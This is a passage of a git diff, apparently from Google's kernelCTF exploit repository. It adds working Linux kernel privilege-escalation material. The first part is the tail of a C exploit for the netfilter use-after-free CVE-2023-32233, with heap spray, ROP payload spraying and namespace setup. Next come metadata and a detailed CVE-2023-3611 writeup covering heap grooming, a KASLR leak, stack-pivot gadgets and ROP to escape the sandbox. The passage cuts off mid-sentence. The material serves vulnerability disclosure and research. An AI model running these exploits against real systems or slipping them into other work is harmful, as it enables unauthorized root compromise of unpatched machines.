&race_set_elem_key, cfg_race_set_elem_count); + } + + pwn_uaf_trigger(nl); + usleep(cfg_race_lead_usleep); + pwn_uaf_race(nl); + usleep(cfg_race_lag_usleep); + + // spray chain + pwn_uaf_spray_chain(nl); + + // del set + pwn_uaf_del_set(nl); + usleep(cfg_reuse_usleep); + + // spray rule + pwn_uaf_spray_rule(nl); + + // dump chain udata + pwn_read_dump_chain(nl); + usleep(cfg_reuse_usleep); + + // del rule + pwn_uaf_del_rule(nl, -1); + usleep(cfg_reuse_usleep); + + // spray rop payload + pwn_uaf_spray_chain_rop(nl); + usleep(cfg_reuse_usleep); + + // del chain + pwn_uaf_del_chain(nl); + usleep(cfg_reuse_usleep); + + // alloc fake rule + pwn_uaf_spray_chain_fake_rule(nl); + usleep(cfg_reuse_usleep); + + // del rule + if(!fork()){ + pwn_uaf_del_rule(nl, 0xffff); + usleep(cfg_reuse_usleep); + win(); + } + + sleep(1000); + + return 0; +} + +void write_file(const char *filename, char *text) { + + int fd = open(filename, O_RDWR | O_CREAT); + + write(fd, text, strlen(text)); + close(fd); +} + +void new_ns(void) { + uid_t uid = getuid(); + gid_t gid = getgid(); + char buffer[0x100]; + + unshare(CLONE_NEWUSER | CLONE_NEWNS); + + unshare(CLONE_NEWNET); + + write_file("/proc/self/setgroups", "deny"); + + snprintf(buffer, sizeof(buffer), "0 %d 1", uid); + write_file("/proc/self/uid_map", buffer); + snprintf(buffer, sizeof(buffer), "0 %d 1", gid); + write_file("/proc/self/gid_map", buffer); +} + +volatile int cpu_spinning = 1; + +static void pwn(size_t cpu_set_size, const cpu_set_t *cpu_set, int socketfd) +{ + int res; + + res = sched_setaffinity(0, cpu_set_size, cpu_set); + if (res != 0) { + err(1, "Cannot into sched_setaffinity()"); + } + + new_ns(); + + int status = pwn_main(); + + printf("[*] Signaling status=%d to coordinator...\n", status); + res = write(socketfd, &status, sizeof(status)); + if (res != sizeof(status)) { + err(1, "Cannot into write()"); + } + + while (cpu_spinning) { + usleep(60 * 1000 * 1000); + } +} + +/**************************************************************************** + * + * Coordinator + * + */ + +static int clone_helper(void *ctx) +{ + jmp_buf *env = ctx; + + longjmp(*env, 1); + err(1, "Cannot into pthread_attr_init()"); + return 1; +} + +__attribute__((noinline)) +static pid_t clone_with_longjmp(unsigned long flags, jmp_buf *env) +{ + char helper_stack_buffer[2 * PTHREAD_STACK_MIN + __BIGGEST_ALIGNMENT__]; + + uintptr_t helper_stack_addr = (uintptr_t) helper_stack_buffer; + helper_stack_addr += PTHREAD_STACK_MIN + __BIGGEST_ALIGNMENT__ - 1; + helper_stack_addr -= helper_stack_addr % __BIGGEST_ALIGNMENT__; + void *helper_stack = (void *) helper_stack_addr; + + pid_t pid = clone(clone_helper, helper_stack, flags, env); + if (pid == -1) { + err(1, "Cannot into clone()"); + } + + return pid; +} + +static void pwn_helper(size_t cpu_set_size, const cpu_set_t *cpu_set) +{ + int res; + + int socketfd[2]; + res = socketpair(AF_UNIX, SOCK_STREAM, 0, socketfd); + if (res != 0) { + err(1, "Cannot into socketpair()"); + } + + jmp_buf env; + if (setjmp(env) == 0) { + clone_with_longjmp(SIGCHLD, &env); + } + else { + res = close(socketfd[0]); + if (res != 0) { + err(1, "Cannot into close()"); + } + + char buf[1]; + res = read(socketfd[1], buf, sizeof(buf)); + if (res != sizeof(buf)) { + err(1, "Cannot into read()"); + } + + printf("[*] Starting PWN Worker\n"); + pwn(cpu_set_size, cpu_set, socketfd[1]); + err(1, "Unexpected return from exploit()"); + } + + res = close(socketfd[1]); + if (res != 0) { + err(1, "Cannot into close()"); + } + + printf("[*] Signaling PWN Worker...\n"); + char buf[1] = {}; + res = write(socketfd[0], buf, sizeof(buf)); + if (res != sizeof(buf)) { + err(1, "Cannot into write()"); + } + + printf("[*] Waiting for PWN Worker...\n"); + int status = EFAULT; + res = read(socketfd[0], &status, sizeof(status)); + if (res != sizeof(status)) { + err(1, "Cannot into read()"); + } + + win(); + exit(1); +} + +static void exploit() +{ + int cpu_alloc = 0x80; + size_t cpu_set_size; + + printf("[*] Netfilter UAF exploit\n\n"); + + cfg_load("profile"); + + cpu_set_size = CPU_ALLOC_SIZE(cpu_alloc); + cpu_set_t *cpu_affinity = CPU_ALLOC(cpu_alloc); + if (cpu_affinity == NULL) { + err(1, "Cannot into CPU_ALLOC()"); + } + + CPU_ZERO_S(cpu_set_size, cpu_affinity); + CPU_SET_S(0, cpu_set_size, cpu_affinity); + + pwn_helper(cpu_set_size, cpu_affinity); +} + +int main(int argc, char *argv[], char *envp[]) +{ + setbuf(stdout, NULL); + + exploit(); +} diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/metadata.json new file mode 100644 index 00000000..35a58a09 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/metadata.json @@ -0,0 +1,28 @@ +{ + "$schema" : "https://google.github.io/security-research/kernelctf/metadata.schema.v2.json", + "submission_ids": ["exp61"], + "vulnerability": { + "summary": "Use-After-Free in net/netfilter", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c1592a89942e9678f7d9c8030efa777c0d57edab", + "cve": "CVE-2023-32233", + "affected_versions": ["3.13-rc1 - 6.4-rc6"], + "requirements": { + "attack_surface": [], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NETFILTER", "CONFIG_NF_TABLES" + ] + } + }, + "exploits": [ + { + "environment": "mitigation-6.1.0", + "uses": [ + "userns" + ], + "requires_seperate_kaslr_leak":false, + "stability_notes" : "6 ~ 7 times success per 10 times run" + } + ] + } + \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-3390_lts_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-3390_lts_cos_mitigation/docs/exploit.md index 454f9016..924191fd 100644 --- a/pocs/linux/kernelctf/CVE-2023-3390_lts_cos_mitigation/docs/exploit.md +++ b/pocs/linux/kernelctf/CVE-2023-3390_lts_cos_mitigation/docs/exploit.md @@ -193,27 +193,32 @@ static void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set) After that, `nf_tables_destroy_set` function, which is eventually reached from `nf_tables_rule_destroy` [1], checks that the given set is an anonymous set and is not bind to anywhere [2]. If so, `nft_set_destroy` function frees this set [3]. -- [net/netfilter/nf_tables_api.c:nft_set_lookup()](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/net/netfilter/nf_tables_api.c?h=linux-6.1.y&id=d2869ace6eeb8ea8a6e70e6904524c5a6456d3fb#n3893) +- [net/netfilter/nf_tables_api.c:nft_set_lookup_byid()](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/net/netfilter/nf_tables_api.c?h=linux-6.1.y&id=d2869ace6eeb8ea8a6e70e6904524c5a6456d3fb#n3923) ```c -static struct nft_set *nft_set_lookup(const struct nft_table *table, - const struct nlattr *nla, u8 genmask) +static struct nft_set *nft_set_lookup_byid(const struct net *net, + const struct nft_table *table, + const struct nlattr *nla, u8 genmask) { - struct nft_set *set; - - if (nla == NULL) - return ERR_PTR(-EINVAL); - - list_for_each_entry_rcu(set, &table->sets, list) { - if (!nla_strcmp(nla, set->name) && - nft_active_genmask(set, genmask)) // [1] - return set; + struct nftables_pernet *nft_net = nft_pernet(net); + u32 id = ntohl(nla_get_be32(nla)); + struct nft_trans *trans; + + list_for_each_entry(trans, &nft_net->commit_list, list) { + if (trans->msg_type == NFT_MSG_NEWSET) { + struct nft_set *set = nft_trans_set(trans); + + if (id == nft_trans_set_id(trans) && + set->table == table && + nft_active_genmask(set, genmask)) // [1] + return set; + } } return ERR_PTR(-ENOENT); } ``` -Unfortunately, this freed set object is still accessible in the following commands of the same transaction. This is because this object was not properly deactivated (i.e., `nft_activate_genmask` will return true). From this, we can see why the patch works; It doesn't unbind the set object but only deactivates it, making it non-accessible. +Unfortunately, this freed set object is still accessible in the following commands of the same transaction. This is because this object was still in transaction list and not properly deactivated (i.e., `nft_activate_genmask` will return true). From this, we can see why the patch works; It doesn't unbind the set object but only deactivates it, making it non-accessible. ![vuln_2](./img/vuln_2.png) diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/docs/exploit.md new file mode 100644 index 00000000..4fc0c80f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/docs/exploit.md @@ -0,0 +1,622 @@ +Exploit Details +=============== + +Exploit demo for CVE-2023-3611. +Flags: +- `kernelCTF{v1:lts-6.1.35:1688135277:098358ab92b525678de0c42817048d693400c68e}` +- `kernelCTF{v1:mitigation-6.1-v2:1688982924:6bdfebbb5220c89a748c8c7a0fbeec5d34988932}` + +Note: The original mitigation exploit targeted the `mitigation-6.1-broken` instance, it was later modified to work on `mitigation-6.1-v2`. + + +# LTS +## Summary + +At a high level the exploit performs the following: + +- Trigger the vulnerability into a user controlled buffer, leaving us with a controllable `struct qfq_group` object +- Choose the object in such a way that we can trigger an OOB write into `struct qfq_sched` +- Use this write to achieve an UaF in the `kmalloc-128` cache +- Pivot to `struct tcf_proto` objects to obtain an KASLR leak as well as RIP control when we reclaim the object +- Pivot the stack back into a user controlled buffer in the `kmalloc-8192` cache. + +## Steps in Detail + +### Step 1: Abusing the Vulnerability + +Triggering the vulnerability is trivial, though actually taking something useful +out of the out-of-bounds group is not obvious. +Even though the pointer is used in a few places I only identified few places which +seem particularly interesting from a exploitation perspective. We will focus on +the following: +```c +static void qfq_schedule_agg(struct qfq_sched *q, struct qfq_aggregate *agg) +{ + struct qfq_group *grp = agg->grp; +// ... + s = qfq_calc_state(q, grp); + __set_bit(grp->index, &q->bitmaps[s]); // [1] +// ... +} +``` + +Looking at `qfq_schedule_agg` we can see that we have a bit set operation at a controlled index [1]. +The idea will be to flip a bit on a pointer to eventually cause a type confusion. +Looking at the `struct qfq_sched` we can see that there are only few members +available to us after the `bitmaps[]` member (we cannot use a negative index). + +```c +struct qfq_sched { + struct tcf_proto __rcu *filter_list; + struct tcf_block *block; + struct Qdisc_class_hash clhash; + + u64 oldV, V; /* Precise virtual times. */ + struct qfq_aggregate *in_serv_agg; /* Aggregate being served. */ + u32 wsum; /* weight sum */ + u32 iwsum; /* inverse weight sum */ + + unsigned long bitmaps[QFQ_MAX_STATE]; /* Group bitmaps. */ + struct qfq_group groups[QFQ_MAX_INDEX + 1]; /* The groups. */ + u32 min_slot_shift; /* Index of the group-0 bit in the bitmaps. */ + + u32 max_agg_classes; /* Max number of classes per aggr. */ + struct hlist_head nonfull_aggs; /* Aggs with room for more classes. */ +}; +``` + +The `nonfull_aggs` member is interesting as this list will be used to lookup +aggregates when creating new classes: +```c +static struct qfq_aggregate *qfq_find_agg(struct qfq_sched *q, + u32 lmax, u32 weight) +{ + struct qfq_aggregate *agg; + + hlist_for_each_entry(agg, &q->nonfull_aggs, nonfull_next) + if (agg->lmax == lmax && agg->class_weight == weight) + return agg; + + return NULL; +} +``` +The idea will be to smuggle a fake `qfq_aggregate` into the qdisc which is +hopefully freed when destroying the class that possesses it. +This way we can have a UaF in the `kmalloc-128` slab. +A suitable fake `qfq_aggregate` needs to allow full control of the relevant members +(`lmax`, `class_weight`, `num_classes`). +In order to smuggle the fake object, we will flip a bit of the `nonfull_aggs` list +member to hopefully point to our controlled object: +``` + ++-qfq qdisc----+ +| ... | +| filter_list | +| ... | +-fake object---+ +| bitmaps[] | | | +| groups[] | | | +| ... | +---------------+ +| nonfull_aggs | -------x-------------+ ++--------------+ x | + x +-----> 0200 +-qfq_aggregate-+ ++-controlled o-+ x flip | | +| ... | x a bit | | +| fake grp {} | x +---------------+ +| | x +| ... | x-------------------> 0280 +-fake object---+ +| ... | | | +| | | | ++--------------+ +---------------+ +``` + +By targeting a bit of the `nonfull_aggs` member of the qdisc object we will +potentially be able to inject a fake `struct qfq_aggregate` object into the +qdisc. + +#### Step 1.1: QFQ Internal State Control + +Looking at the code in `qfq_change_class()` we can see that `qfq_add_to_agg()` +is called with the new `agg` after triggering the vulnerability: + +```c +// net/sched/sch_qfq.c + +/* Add class to aggregate. */ +static void qfq_add_to_agg(struct qfq_sched *q, + struct qfq_aggregate *agg, + struct qfq_class *cl) +{ + cl->agg = agg; + + qfq_update_agg(q, agg, agg->num_classes+1); // [1] + if (cl->qdisc->q.qlen > 0) { /* adding an active class */ + list_add_tail(&cl->alist, &agg->active); + if (list_first_entry(&agg->active, struct qfq_class, alist) == + cl && q->in_serv_agg != agg) /* agg was inactive */ + qfq_activate_agg(q, agg, enqueue); /* schedule agg */ // [2] + } +} +``` + +After the out-of-bound group is stored into the aggregate in [1] we can +hit `qfq_activate_agg()` [2]. + +```c +/* Update agg ts and schedule agg for service */ +static void qfq_activate_agg(struct qfq_sched *q, struct qfq_aggregate *agg, + enum update_reason reason) +{ + agg->initial_budget = agg->budget = agg->budgetmax; /* recharge budg. */ + + qfq_update_agg_ts(q, agg, reason); + if (q->in_serv_agg == NULL) { /* no aggr. in service or scheduled */ + q->in_serv_agg = agg; /* start serving this aggregate */ + /* update V: to be in service, agg must be eligible */ + q->oldV = q->V = agg->S; + } else if (agg != q->in_serv_agg) + qfq_schedule_agg(q, agg); // [3] +} +``` + +After passing the checks in `qfq_activate_agg()` we will call the desired +`qfq_schedule_agg()` [3]. + +In order to hit these code paths we need to fullfill certain constraints: +1. `q->in_serv_agg != NULL` and `q->in_serv_agg != new_oob_agg` +2. (sub) qdisc of the owning class of the aggregate needs to be non-empty (`cl->qdisc->q.qlen > 0`) + +We can control `q->in_serv_agg` by enqueuing packets: +```c +static int qfq_enqueue(struct sk_buff *skb, struct Qdisc *sch, + struct sk_buff **to_free) +{ +// ... + qfq_activate_agg(q, agg, enqueue); +// ... +} +``` +Initially `q->in_serv_agg` will be `NULL`, thus we will hit the second branch +in `qfq_activate_agg()` (see above). + +The problem is that, right after enqueuing the packet, the dequeue operation +will reset the state (unless we generate enormous amounts of traffic so that +the scheduling actually kicks in, which however still leaves us with a race). +In order to work around that problem we will modify the sub qdisc of the class +to be a `netem` qdisc, which allows us to add a generously chosen delay, so that +the dequeue operation fails because no packet is available yet. +This will issue a warning in `qfq_peek_skb()`, but that will not be problem for us. + +This solves constraint number one. As a bonus this naturally solves constraint +number two because the underlaying netem qdisc has in fact packets queued, +they are just delayed. + +We need to send packets to the qdisc to trigger the vulnerability anyway, so +we can combine those goals. +After corrupting an aggregate using the vulnerability, the qdisc is in a very unstable +state, so we have to make sure, that the packet that triggers the vulnerability is dropped +(and the ones after, too). +This will prevent further calls to `qfq_activate_agg()` and a lot of code paths in +`qfq_dequeue()` which are likely to make the kernel panic with the fake group in place. +In order to achieve that we will set the limit for the configured `netem` qdisc +accordingly, dropping packets after the limit was reached. + +Finally, also note that we setup the sizetable in such a way that it performs a table lookup +to get the resulting packet size. This way we can choose our packets accordingly +in order to trigger the vulnerability only when we want to. + +### Step 2: Heap Spray + +#### Step 2.1: QFQ Qdiscs and `kmalloc-8192` + +To successfully make use of the vulnerability we need a controllable object in +the `kmalloc-8192` cache. + +The qdisc is allocated by `qdisc_alloc()`: +```c +// qdisc_alloc() in net/sched/sch_generic.c + struct Qdisc *sch; + +// .. + + dev = dev_queue->dev; + sch = kzalloc_node(size, GFP_KERNEL, netdev_queue_numa_node_read(dev_queue)); +``` + +Thus we need an object which is allocated using `GFP_KERNEL` as well. +Though the choice might be questionable in hindsight, I chose the well known +`struct user_key_payload` for this purpose, as this structure can be allocated +with variable sizes in 24 < 32767 + 24. +One downside of the key structure is the fact that we can only allocate a few +of them because our quota is (by default) limited to 20000 bytes. +Besides that we can easily control a `qfq_group` object at our desired offset +according to the `lmax` we set when triggering the vulnerability: +```c +struct qfq_group { + u64 S, F; /* group timestamps (approx). */ + unsigned int slot_shift; /* Slot shift. */ + unsigned int index; /* Group index. */ + unsigned int front; /* Index of the front slot. */ + unsigned long full_slots; /* non-empty slots */ + + /* Array of RR lists of active aggregates. */ + struct hlist_head slots[QFQ_MAX_SLOTS]; +}; +``` + +Because of the restrictions we can only spray 3-4 fake objects which greatly +reduces the chances of hitting the correct object when triggering the vulnerability. + +We will spray several qdiscs to groom the heap. +After that we will spray a few key payloads and hope that one of them lands right after +the last qdisc we sprayed. +The enqueue operation is naturally prone to kernel panics, and unluckily especially +when the fake object is containing zeros only, which is somewhat likely in the +rather less used `kmalloc-8192`. + +There are several strategies to make it more stable, but we are happy with the +roughly 25% of the naive approach. + +In order to spray qdiscs we will create child processes, each with a new +network namespace to easily generate loopback devices to attach qdiscs to. +The only real requirement of the payload is to have the correct `grp->index` +set. Additionally keeping all other fields zero ensures that adding nodes to the +`grp->slots[]` lists does not cause any troubles. + +An advantage of using `struct user_key_payload` is the fact, that we know when the heap +spray succeeded because `qfq_slot_insert()` will add the aggregate pointer into the +`slots` array of the group we control: + +```c +static void qfq_slot_insert(struct qfq_group *grp, struct qfq_aggregate *agg, + u64 roundedS) +{ + +// .. + + hlist_add_head(&agg->next, &grp->slots[i]); + __set_bit(slot, &grp->full_slots); +} +``` + +With the key control we can then read the key back and check if we got a kernel +heap pointer. +As a bonus, we can check if the pointer has the relevant bit that we want to flip +unset, so that we know whether the bitflip succeeded. +If it failed and we got that far, we can easily retry. + + +#### Step 2.2: qfq_aggregate and `kmalloc-128` + +Since we already utilized `struct user_key_payload`, we will do so again. +The payloads are much smaller now, too, so we do not have to worry about quota restrictions. + +Looking at the `struct qfq_aggregate` we can see that all the relevant fields can +be controlled with a small key payload: +```c +struct qfq_aggregate { + struct hlist_node next; /* 0 16 */ + u64 S; /* 16 8 */ + + // start of user controllable data: + u64 F; /* 24 8 */ + struct qfq_group * grp; /* 32 8 */ + u32 class_weight; /* 40 4 */ + int lmax; /* 44 4 */ + u32 inv_w; /* 48 4 */ + u32 budgetmax; /* 52 4 */ + u32 initial_budget; /* 56 4 */ + u32 budget; /* 60 4 */ + /* --- cacheline 1 boundary (64 bytes) --- */ + int num_classes; /* 64 4 */ + + u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */ + + struct list_head active; /* 72 16 */ + struct hlist_node nonfull_next; /* 88 16 */ + + /* size: 104, cachelines: 2, members: 13 */ + /* sum members: 100, holes: 1, sum holes: 4 */ + /* last cacheline: 40 bytes */ +} +``` +By choosing a unique `lmax` for this aggregate we can identify it later. +Keeping the list heads `NULL` will be fine, since they will be initialized +by the kernel code if they are not yet. +Leaving `grp` equal to `NULL` will make the kernel code overwrite it with a +pointer into the `q` as well (see `qfq_update_agg()`). +We will choose `num_classes` to be equal to 0 so that deletion of the +to-be-owning class will cause the fake aggregate to be freed. + +This will achieve a couple of things: +- We can craft a fake aggregate without needing any knowledge of kernel pointers + (even though we would know the pointer of the aggregate we are faking). +- We have a unique identifier to make sure that the spray was successful before + getting the kernel unstable +- When reading back the corrupted key payload, we have another leak to kernel heap + memory. Specifically the `kmalloc-8192` cache this time. This allows us to + precisely locate our initial key buffer, too. + +We will spray a few fake aggregates before triggering the vulnerability +and a few after the trigger. This way we hopefully increase our chances to +win the bit flip. + + +### Step 3: Trigger Use-after-Free + +To recap, at this point we have the following: +- A QFQ qdisc in `kmalloc-8192`, right behind it a user controlled buffer + - we know the pointers of both of them +- A `qfq_class` with a fake `qfq_aggregate` which is actually a `user_key_payload` we control + - we know the pointer of this buffer as well + +We can now free the aggregate by deleting the class we attached it to. + +Looking for objects which can be used to reclaim the freed aggregate I found +the `struct tcf_proto` (in `include/net/sch_generic.h`): +```c +struct tcf_proto { + void* next; /* 0 8 */ + void * root; /* 8 8 */ + int (*classify)(struct sk_buff *, const struct tcf_proto *, struct tcf_result *); /* 16 8 */ + + // start of user controllable data + u16 protocol; /* 24 2 */ + + /* XXX 2 bytes hole, try to pack */ + u8 __pad0[2]; + + u32 prio; /* 28 4 */ + void * data; /* 32 8 */ + const struct tcf_proto_ops * ops; /* 40 8 */ + struct tcf_chain * chain; /* 48 8 */ + u32 lock; /* 56 4 */ + u8 deleting; /* 60 1 */ + + /* XXX 3 bytes hole, try to pack */ + u8 __pad1[3]; + + /* --- cacheline 1 boundary (64 bytes) --- */ + u32 refcnt; /* 64 4 */ + + /* XXX 4 bytes hole, try to pack */ + u8 __pad2[4]; + + u8 rcu[16]; + struct hlist_node destroy_ht_node; /* 88 16 */ + + /* size: 104, cachelines: 2, members: 13 */ + /* sum members: 95, holes: 3, sum holes: 9 */ + /* forced alignments: 1, forced holes: 1, sum forced holes: 4 */ + /* last cacheline: 40 bytes */ +}; +``` + +By reclaiming the freed `struct qfq_aggregate` with this object, we will be able +to leak a pointer which allows us to bypass KASLR (`*ops`). +Additionally we can later overwrite the `ops` to gain RIP control. +This structure is particularly well suited for this, as you will see later. + +Leaking the structure contents turns out to be non-trivial. +The `classify` member of the `struct tcf_proto` (a shortcut to `ops->classify`) +will overlap with the size field of `struct user_key_payload` at offset 16. +This size field is a `u16`, thus the lowest to bytes of the `classify` function pointer. +The problem is that `keyctl_read_key` in `security/keys/keyctl.c` will either read +the whole key or no key at all. +This means have to survive a kernel heap read up to the size specified by the kernel +pointer. +Especially with the guard pages present, this will likely fail. +In order to circumvent this problem we will choose a classifier with a "low" address. +Specifically we choose `rsvp` because it has the lowest available: +``` +$ cat kallsyms | grep -Ew "basic_classify|cls_bpf_classify|cls_cgroup_classify|fw_classify|route4_classify|u32_classify|rsvp_classify" +ffffffff89cdba10 t u32_classify +ffffffff89cdef10 t route4_classify +ffffffff89cdf300 t fw_classify +ffffffff89ce1710 t rsvp_classify +ffffffff89ce27d0 t basic_classify +ffffffff89ce3320 t cls_cgroup_classify +ffffffff89ce3c30 t cls_bpf_classify +``` + +This means we only have to copy `0x1710` bytes which works well practically. + +### Step 4: Getting RIP Control + +By overwriting the `ops` member of the aforementioned `struct tcf_proto` we are +on a good way to gain arbitrary kernel code execution. + +Looking through references to the available function pointers I chose the path +through `tc_get_tfilter()`: + +```c +static int tc_get_tfilter(struct sk_buff *skb, struct nlmsghdr *n, + struct netlink_ext_ack *extack) { + struct tcf_proto *tp = NULL; + +// ... + + tp = tcf_chain_tp_find(chain, &chain_info, protocol, + prio, false); // [1] + +// ... + + fh = tp->ops->get(tp, t->tcm_handle); // [2] + + if (!fh) { + NL_SET_ERR_MSG(extack, "Specified filter handle not found"); + err = -ENOENT; + } else { + err = tfilter_notify(net, skb, n, tp, block, q, parent, + fh, RTM_NEWTFILTER, true, rtnl_held); // [3] + if (err < 0) + NL_SET_ERR_MSG(extack, "Failed to send filter notify message"); + } + +// ... + +} + +static int tcf_fill_node(struct net *net, struct sk_buff *skb, + struct tcf_proto *tp, struct tcf_block *block, + struct Qdisc *q, u32 parent, void *fh, + u32 portid, u32 seq, u16 flags, int event, + bool terse_dump, bool rtnl_held) +{ + +// ... + + // [4] + if (tp->ops->dump && + tp->ops->dump(net, tp, fh, skb, tcm, rtnl_held) < 0) + goto nla_put_failure; + +// ... +} +``` + +First the structure is retrieved [1]. We will have a closer look at this later. +After that the `ops->get()` function is invoked, with `rdi` pointing to the buffer +itself and `rsi` pointing to a handle we specified. + +I could not find a proper stack pivoting gadget which would jump to memory controlled +by `rdi` so we will pursue a different idea: +We will set `ops->get` to point to a gadget which will simply return `rdi`. +This way, we will eventually call `tcf_fill_node()` in `tfilter_notify()` [3]. +In `tcf_fill_node()` `ops->dump()` [4] is invoked, now with more control over +the parameters. Even though we have useful pointers available in both `rsi` +and `rdx`, the following stack pivot will only use `rsi`: + +We will set `ops->dump()` to the following gadget: +```nasm +push rsi; +jmp [rsi + 0x39] +``` + +With this gadget we can perform a stack pivot into our fake `struct tcf_proto`. +Since this object is quite small (and some fields are constrained), we will +pivot the stack again. +Naturally a good target is the large buffer in `kmalloc-8192` because we already +know the address and we have plenty of space there. +Note that we cannot modify the key payload, thus have to free it and repeat the +spray. +Also, note that the `ops` member is introducing one level of pointer indirection, +but we will use the large buffer for that, too. + +In order to do the first pivot, we choose the following gadget chain: +```nasm +pop rsp; +add rsp, 0x18; +pop rbx; +pop rbp; +pop r12; +ret; +``` +This chain is specifically chosen to overlay the `struct tcf_proto` in such a way +that it does not touch any vital members. + +We can control `rbp` with this chain, thus we use the following gadget to pivot +to the prepared stack in the large buffer: +```nasm +mov rsp, rbp; +pop rbp; +ret +``` + +After that we are on a large stack without any constraints, thus assembling a +standard ROP payload escalating privileges and escaping the sandbox is trivial. + +#### Step 4.1: Stabilizing the Trigger + +As mentioned earlier `struct tcf_proto` is a very good choice as an +overwrite target. +Looking at the way the fake structure is retrieved we will see that we +can make use of the error conditions in order to make the trigger completely stable. + +```c +// in tc_get_tfilter() + if (!tp || IS_ERR(tp)) { + NL_SET_ERR_MSG(extack, "Filter with specified priority/protocol not found"); + err = tp ? PTR_ERR(tp) : -ENOENT; // [1] + goto errout; + } else if (tca[TCA_KIND] && nla_strcmp(tca[TCA_KIND], tp->ops->kind)) { + NL_SET_ERR_MSG(extack, "Specified filter kind does not match existing one"); + err = -EINVAL; // [2] + goto errout; + } +``` + +By choosing a unique protocol and priority for the fake `tcf_proto` we can +prevent wrong structures from being found. +If the kernel cannot find the requested protocol / priority it will issue an +`ENOENT` [1]. By catching this error we know whether the initial spray +of the fake `tcf_proto` succeeded. +If it did not, we can simply retry. + +When the kernel found the fake `tcf_proto`, it will compare `tp->ops->kind` to +the requested kind. By choosing a unique kind here as well, we will be able +to tell whether the spray of the large objects succeeded because we can +observe the error `EINVAL` if it was wrong. +No code will be executed before that. + + +## General Notes on the Exploit + +The exploit makes heavy use of multiprocessing in order to simplify the use +of the network namespaces (we use one network namespace for each QFQ qdisc we +create.) + +The main function of the exploit performs coordination of the child processes. +The children will notify the parent through a simple wait based event system. +For the first 3 steps a process is repeatedly cloned into `bug_worker()` until +we identified one worker which is actually triggering the vulnerability (still +inside that worker). +Finally, the spraying of `struct tcf_proto` and eventually triggering the RIP +control is done by another worker process `final_stage_worker()`. + +There is one additional worker process which is handling everything related to +the sprayed keys. We need this process because keys are generally scoped by +permissions. To not care about that we have one dedicated process which owns +all the keys and just acts on demand. + +Finally note that the exploit does not make use of any netlink library or the like. +Therefor, you may notice that the code related to netlink is quite verbose. + +### Stability + +The main problem is the initial heap spray where we try to land a large key payload +after the victim qdisc. +Because we only have 3 key payloads available we are unlikely to hit this scenario. +Depending on the instance the success rate was about 30-50%. +I later discovered that this step could be made much more stable by using different +CPUs for the main orchestration and the workers. +Additionally using another object to perform the `kmalloc-8192` spray may be +beneficial, because the limited quota greatly decreases the chances of hitting +a "good" layout. One such object would be `struct qdisc_size_table` as briefly +described in the related mitigation exploits. + +The last steps are quite stable and work almost all of the time. + +Finally, one should note that the exploit is not performing a decent +post-exploitation cleanup. +The vulnerable QFQ qdisc class is not properly cleaned up, thus +as soon as the timers for dequeue operations fire, the kernel will likely +panic. + + +# Mitigation + +The exploit for the mitigation instance largely follows that of CVE-2023-31436, +thus I will not go into too much detail on it. +The main difference is the way we trigger the vulnerability. +(The exploit for CVE-2023-31436 was obviously designed to work for both). + +In summary, instead of the process described above we will directly corrupt the +`filter_list` member of `qfq_sched`. +We need a three-way layout in order for that to work (we are targeting the qdisc +which lies after the controlled buffer). +This will cause a type confusion for the `struct tcf_proto` object which we trivially +expand into RIP control using `struct xdp_umem`. + +Triggering the vulnerability imposes additional constraints on the sprayed sizetables. +Since the group object we want to control is far into the sizetable this is no +problem and can be setup similarly to the LTS version. diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/docs/vulnerability.md new file mode 100644 index 00000000..bcfba71c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/docs/vulnerability.md @@ -0,0 +1,74 @@ +Vulnerability Details +===================== + +CVE-2023-3611: An out-of-bounds write vulnerability in the Linux kernel's net/sched: sch_qfq component can be exploited to achieve local privilege escalation. The qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks. + +This vulnerability affects the packet scheduler subsystem, specifically QFQ+. + +An attacker can utilize this vulnerability to cause a slab-out-of-bounds read/write in the `kmalloc-8192` cache. + +## Requirements + +A user needs to be able to modify qdiscs, thus requiring `CAP_NET_ADMIN`. +Naturally this will be obtained through usernamespaces, thus one may require `CONFIG_USER_NS`. + +The specific qdisc in question is QFQ, which needs to be enabled `CONFIG_NET_SCH_QFQ`. + +## History + +The fixing commit is https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e337087c3b5805fe0b8a46ba622a962880b5d64 +This is a fix for 462dbc9101ac ("pkt_sched: QFQ Plus: fair-queueing service at DRR cost") dating back to 2012. +Based on this I assume 3.0.x+ is affected. + +## Triggering the Vulnerability + +The issue is similar to CVE-2023-31436. + +Consider the following code in `net/sched/sch_qfq.c`: + +```c +static int qfq_enqueue(struct sk_buff *skb, struct Qdisc *sch, + struct sk_buff **to_free) +{ + unsigned int len = qdisc_pkt_len(skb), gso_segs; + + // ... + + if (unlikely(cl->agg->lmax < len)) { + pr_debug("qfq: increasing maxpkt from %u to %u for class %u", + cl->agg->lmax, len, cl->common.classid); + err = qfq_change_agg(sch, cl, cl->agg->class_weight, len); + if (err) { + cl->qstats.drops++; + return qdisc_drop(skb, sch, to_free); + } + + // ... + + } +``` + +Here `lmax` is increased without any bounds checks according to the packet length `len`. +Usually this would not impose a problem because packet sizes are naturally limited. +This is however not the actual packet length, rather the `qdisc_pkt_len(skb)` which might apply size transformations according to `struct qdisc_size_table` as created by `qdisc_get_stab()` in `net/sched/sch_api.c` if the `TCA_STAB` option was set when modifying the qdisc. +A user may choose 